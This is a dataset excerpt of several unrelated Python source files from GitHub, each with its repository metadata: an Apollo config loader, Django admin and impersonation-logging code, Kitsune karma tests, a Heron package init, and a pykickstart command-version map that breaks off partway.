text
stringlengths 4
1.02M
| meta
dict |
|---|---|
from __future__ import absolute_import
import os
from apollo import ApolloInstance
from .config import read_global_config, global_config_path
def get_instance(instance_name=None):
# I don't like reading the config twice.
conf = read_global_config()
if not os.path.exists(global_config_path()):
# Probably creating the file for the first time.
return None
if instance_name is None or instance_name == '__default':
try:
instance_name = conf['__default']
except KeyError:
raise Exception("Unknown Apollo instance and no __default provided")
if instance_name not in conf:
raise Exception("Unknown Apollo instance; check spelling or add to ~/.apollo-arrow.yml")
return conf[instance_name]
def get_apollo_instance(instance_name=None):
conf = get_instance(instance_name=instance_name)
return ApolloInstance(conf['url'], conf['username'], conf['password'])
|
{
"content_hash": "6c844b8e8e063eab2efb9909f90d8874",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 96,
"avg_line_length": 34,
"alnum_prop": 0.6859243697478992,
"repo_name": "galaxy-genome-annotation/python-apollo",
"id": "7307afd86ce9e94f19f2dab057b30cf4198c3c54",
"size": "952",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "arrow/apollo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "131"
},
{
"name": "Python",
"bytes": "210325"
},
{
"name": "Shell",
"bytes": "2584"
}
],
"symlink_target": ""
}
|
'''
Created on Apr 28, 2010
@author: jnaous
'''
from django.contrib import admin
from models import UserProfile
admin.site.register(UserProfile)
|
{
"content_hash": "89998b308d0d27ccd203d5126557b7e0",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 32,
"avg_line_length": 16.333333333333332,
"alnum_prop": 0.7687074829931972,
"repo_name": "dana-i2cat/felix",
"id": "7546f7b99cbcdbc9c150af6e4f631beb00b9d40a",
"size": "147",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "expedient/src/python/expedient/clearinghouse/users/admin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "337811"
},
{
"name": "DTrace",
"bytes": "370"
},
{
"name": "Elixir",
"bytes": "17243"
},
{
"name": "Emacs Lisp",
"bytes": "1098"
},
{
"name": "Groff",
"bytes": "1735"
},
{
"name": "HTML",
"bytes": "660363"
},
{
"name": "Java",
"bytes": "18362"
},
{
"name": "JavaScript",
"bytes": "838960"
},
{
"name": "Makefile",
"bytes": "11211"
},
{
"name": "Perl",
"bytes": "5416"
},
{
"name": "Python",
"bytes": "7875883"
},
{
"name": "Shell",
"bytes": "258079"
}
],
"symlink_target": ""
}
|
from nose.tools import eq_
from kitsune.karma.templatetags.jinja_helpers import karma_titles
from kitsune.karma.models import Title
from kitsune.users.tests import TestCase, UserFactory, GroupFactory
class KarmaTitleHelperTests(TestCase):
def setUp(self):
super(KarmaTitleHelperTests, self).setUp()
self.user = UserFactory()
self.group = GroupFactory(name='group')
self.user.groups.add(self.group)
def test_user_title(self):
title = 'User Title'
t = Title(name=title)
t.save()
t.users.add(self.user)
titles = karma_titles(self.user)
eq_(1, len(titles))
eq_(title, titles[0].name)
def test_group_title(self):
title = 'Group Title'
t = Title(name=title)
t.save()
t.groups.add(self.group)
titles = karma_titles(self.user)
eq_(1, len(titles))
eq_(title, titles[0].name)
def test_user_and_group_title(self):
u_title = 'User Title'
g_title = 'Group Title'
t = Title(name=u_title)
t.save()
t.users.add(self.user)
t = Title(name=g_title)
t.save()
t.groups.add(self.group)
titles = [k.name for k in karma_titles(self.user)]
eq_(2, len(titles))
assert u_title in titles
assert g_title in titles
|
{
"content_hash": "4d38e5722e22a163d55f6889000c5810",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 67,
"avg_line_length": 29.933333333333334,
"alnum_prop": 0.5983667409057164,
"repo_name": "anushbmx/kitsune",
"id": "7d8897728957c655f2b8ae0de4c8c4727d07ba53",
"size": "1347",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "kitsune/karma/tests/test_templatetags.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "335184"
},
{
"name": "Dockerfile",
"bytes": "3547"
},
{
"name": "Groovy",
"bytes": "4221"
},
{
"name": "HTML",
"bytes": "628447"
},
{
"name": "JavaScript",
"bytes": "802494"
},
{
"name": "Makefile",
"bytes": "3600"
},
{
"name": "Python",
"bytes": "2994910"
},
{
"name": "Shell",
"bytes": "19325"
},
{
"name": "TSQL",
"bytes": "1035"
}
],
"symlink_target": ""
}
|
''' common module '''
__all__ = ['common']
from heron.tools.ui.src.python.handlers.common.consts import *
from heron.tools.ui.src.python.handlers.common.utils import *
|
{
"content_hash": "d13fe4ade4564a19be9f8fadbbd60212",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 62,
"avg_line_length": 33.8,
"alnum_prop": 0.7218934911242604,
"repo_name": "nlu90/heron",
"id": "4ace12b20556e6d08730c7161160cde9d81c2fca",
"size": "954",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "heron/tools/ui/src/python/handlers/common/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "14063"
},
{
"name": "C++",
"bytes": "1723598"
},
{
"name": "CSS",
"bytes": "77708"
},
{
"name": "HCL",
"bytes": "5314"
},
{
"name": "HTML",
"bytes": "39414"
},
{
"name": "Java",
"bytes": "4879240"
},
{
"name": "JavaScript",
"bytes": "1107160"
},
{
"name": "M4",
"bytes": "18741"
},
{
"name": "Makefile",
"bytes": "1046"
},
{
"name": "Objective-C",
"bytes": "2143"
},
{
"name": "Perl",
"bytes": "9298"
},
{
"name": "Python",
"bytes": "1693745"
},
{
"name": "Ruby",
"bytes": "1930"
},
{
"name": "Scala",
"bytes": "130046"
},
{
"name": "Shell",
"bytes": "197064"
},
{
"name": "Smarty",
"bytes": "528"
}
],
"symlink_target": ""
}
|
import logging
import hashlib
from django.conf import settings
from django.dispatch import Signal, receiver
from django.utils.timezone import now as tz_now
from django.utils.crypto import get_random_string
from .models import ImpersonationLog
logger = logging.getLogger(__name__)
# signal sent when an impersonation session begins
session_begin = Signal(
providing_args=['impersonator', 'impersonating', 'request']
)
# signal sent when an impersonation session ends
session_end = Signal(
providing_args=['impersonator', 'impersonating', 'request']
)
def gen_unique_id():
return hashlib.sha1(
u'{0}:{1}'.format(get_random_string(), tz_now()).encode('utf-8')
).hexdigest()
@receiver(session_begin, dispatch_uid='impersonate.signals.on_session_begin')
def on_session_begin(sender, **kwargs):
''' Create a new ImpersonationLog object.
'''
impersonator = kwargs.get('impersonator')
impersonating = kwargs.get('impersonating')
logger.info(u'{0} has started impersonating {1}.'.format(
impersonator,
impersonating,
))
if getattr(settings, 'IMPERSONATE_DISABLE_LOGGING', False):
return
request = kwargs.get('request')
session_key = gen_unique_id()
ImpersonationLog.objects.create(
impersonator=impersonator,
impersonating=impersonating,
session_key=session_key,
session_started_at=tz_now()
)
request.session['_impersonate_session_id'] = session_key
request.session.modified = True
@receiver(session_end, dispatch_uid='impersonate.signals.on_session_end')
def on_session_end(sender, **kwargs):
''' Update ImpersonationLog with the end timestamp.
This uses the combination of session_key, impersonator and
user being impersonated to look up the corresponding
impersonation log object.
'''
impersonator = kwargs.get('impersonator')
impersonating = kwargs.get('impersonating')
logger.info(u'{0} has finished impersonating {1}.'.format(
impersonator,
impersonating,
))
if getattr(settings, 'IMPERSONATE_DISABLE_LOGGING', False):
return
request = kwargs.get('request')
session_key = request.session.get('_impersonate_session_id', None)
try:
# look for unfinished sessions that match impersonator / subject
log = ImpersonationLog.objects.get(
impersonator=impersonator,
impersonating=impersonating,
session_key=session_key,
session_ended_at__isnull=True,
)
log.session_ended_at = tz_now()
log.save()
except ImpersonationLog.DoesNotExist:
logger.warning(
(u'Unfinished ImpersonationLog could not be found for: '
u'{0}, {1}, {2}').format(
impersonator,
impersonating,
session_key,
)
)
except ImpersonationLog.MultipleObjectsReturned:
logger.warning(
(u'Multiple unfinished ImpersonationLog matching: '
u'{0}, {1}, {2}').format(
impersonator,
impersonating,
session_key,
)
)
del request.session['_impersonate_session_id']
request.session.modified = True
|
{
"content_hash": "ca29c771c6dcc3699d752fffbeab04e2",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 77,
"avg_line_length": 30.60185185185185,
"alnum_prop": 0.6420574886535552,
"repo_name": "Top20Talent/django-impersonate",
"id": "cbed2f15f2dda3a21d05ec44d841040e82922cee",
"size": "3329",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "impersonate/signals.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "2614"
},
{
"name": "Python",
"bytes": "62782"
}
],
"symlink_target": ""
}
|
from pykickstart.version import *
from pykickstart.commands import *
# This map is keyed on kickstart syntax version as provided by
# pykickstart.version. Within each sub-dict is a mapping from command name
# to the class that handles it. This is an onto mapping - that is, multiple
# command names can map to the same class. However, the Handler will ensure
# that only one instance of each class ever exists.
commandMap = {
FC3: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.FC3_Bootloader,
"cdrom": method.FC3_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"driverdisk": driverdisk.FC3_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC3_Reboot,
"harddrive": method.FC3_Method,
"ignoredisk": ignoredisk.FC3_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"langsupport": langsupport.FC3_LangSupport,
"lilo": bootloader.FC3_Bootloader,
"lilocheck": lilocheck.FC3_LiloCheck,
"logvol": logvol.FC3_LogVol,
"monitor": monitor.FC3_Monitor,
"mouse": mouse.FC3_Mouse,
"network": network.FC3_Network,
"nfs": method.FC3_Method,
"part": partition.FC3_Partition,
"partition": partition.FC3_Partition,
"poweroff": reboot.FC3_Reboot,
"raid": raid.FC3_Raid,
"reboot": reboot.FC3_Reboot,
"rootpw": rootpw.FC3_RootPw,
"selinux": selinux.FC3_SELinux,
"shutdown": reboot.FC3_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC3_Timezone,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC3_Method,
"vnc": vnc.FC3_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC3_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on fc3
FC4: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.FC4_Bootloader,
"cdrom": method.FC3_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC3_Reboot,
"harddrive": method.FC3_Method,
"ignoredisk": ignoredisk.FC3_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"langsupport": langsupport.FC3_LangSupport,
"logvol": logvol.FC4_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.FC3_Monitor,
"mouse": mouse.FC3_Mouse,
"network": network.FC4_Network,
"nfs": method.FC3_Method,
"part": partition.FC4_Partition,
"partition": partition.FC4_Partition,
"poweroff": reboot.FC3_Reboot,
"raid": raid.FC4_Raid,
"reboot": reboot.FC3_Reboot,
"rootpw": rootpw.FC3_RootPw,
"selinux": selinux.FC3_SELinux,
"shutdown": reboot.FC3_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC3_Timezone,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC3_Method,
"vnc": vnc.FC3_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC3_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on fc4
FC5: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.FC4_Bootloader,
"cdrom": method.FC3_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC3_Reboot,
"harddrive": method.FC3_Method,
"ignoredisk": ignoredisk.FC3_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"langsupport": langsupport.FC5_LangSupport,
"logvol": logvol.FC4_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.FC3_Monitor,
"mouse": mouse.FC3_Mouse,
"network": network.FC4_Network,
"nfs": method.FC3_Method,
"part": partition.FC4_Partition,
"partition": partition.FC4_Partition,
"poweroff": reboot.FC3_Reboot,
"raid": raid.FC5_Raid,
"reboot": reboot.FC3_Reboot,
"rootpw": rootpw.FC3_RootPw,
"selinux": selinux.FC3_SELinux,
"shutdown": reboot.FC3_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC3_Timezone,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC3_Method,
"vnc": vnc.FC3_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC3_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on fc5
FC6: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.FC4_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.FC3_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.FC6_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"langsupport": langsupport.FC5_LangSupport,
"logging": logging.FC6_Logging,
"logvol": logvol.FC4_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.FC6_Monitor,
"mouse": mouse.FC3_Mouse,
"multipath": multipath.FC6_MultiPath,
"network": network.FC6_Network,
"nfs": method.FC6_Method,
"part": partition.FC4_Partition,
"partition": partition.FC4_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.FC5_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.FC6_Repo,
"rootpw": rootpw.FC3_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"upgrade": upgrade.FC3_Upgrade,
"user": user.FC6_User,
"url": method.FC6_Method,
"vnc": vnc.FC6_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC6_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on fc6
F7: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.FC4_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.FC3_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.FC6_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.FC4_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.FC6_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.FC6_Network,
"nfs": method.FC6_Method,
"part": partition.FC4_Partition,
"partition": partition.FC4_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F7_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.FC6_Repo,
"rootpw": rootpw.FC3_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC6_Method,
"user": user.FC6_User,
"vnc": vnc.FC6_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC6_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on f7
F8: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F8_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.FC6_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.FC4_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.FC6_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F8_Network,
"nfs": method.FC6_Method,
"part": partition.FC4_Partition,
"partition": partition.FC4_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F7_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F8_Repo,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC6_Method,
"user": user.F8_User,
"vnc": vnc.FC6_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC6_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on f8
F9: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F9_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F8_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.F9_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.FC6_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F9_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.FC6_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F9_Network,
"nfs": method.FC6_Method,
"part": partition.F9_Partition,
"partition": partition.F9_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F9_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F8_Repo,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC6_Method,
"user": user.F8_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F9_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on f9
F10: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F9_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F8_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.F10_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F9_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F9_Network,
"nfs": method.FC6_Method,
"part": partition.F9_Partition,
"partition": partition.F9_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F9_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F8_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC6_Method,
"user": user.F8_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F10_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on f10
F11: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F9_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F8_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.F10_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.F11_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F9_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F9_Network,
"nfs": method.FC6_Method,
"part": partition.F11_Partition,
"partition": partition.F11_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F9_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F11_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.F11_Upgrade,
"url": method.FC6_Method,
"user": user.F8_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F10_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on f11
F12: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F12_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F12_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.F12_DriverDisk,
"fcoe": fcoe.F12_Fcoe,
"firewall": firewall.F10_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"group": group.F12_Group,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.F11_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F12_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F9_Network,
"nfs": method.FC6_Method,
"part": partition.F12_Partition,
"partition": partition.F12_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F12_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F11_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.F11_Upgrade,
"url": method.FC6_Method,
"user": user.F12_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F10_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.F12_ZFCP,
},
# based on f12
F13: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F12_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F12_Bootloader,
"cdrom": method.F13_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.F12_DriverDisk,
"fcoe": fcoe.F13_Fcoe,
"firewall": firewall.F10_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"group": group.F12_Group,
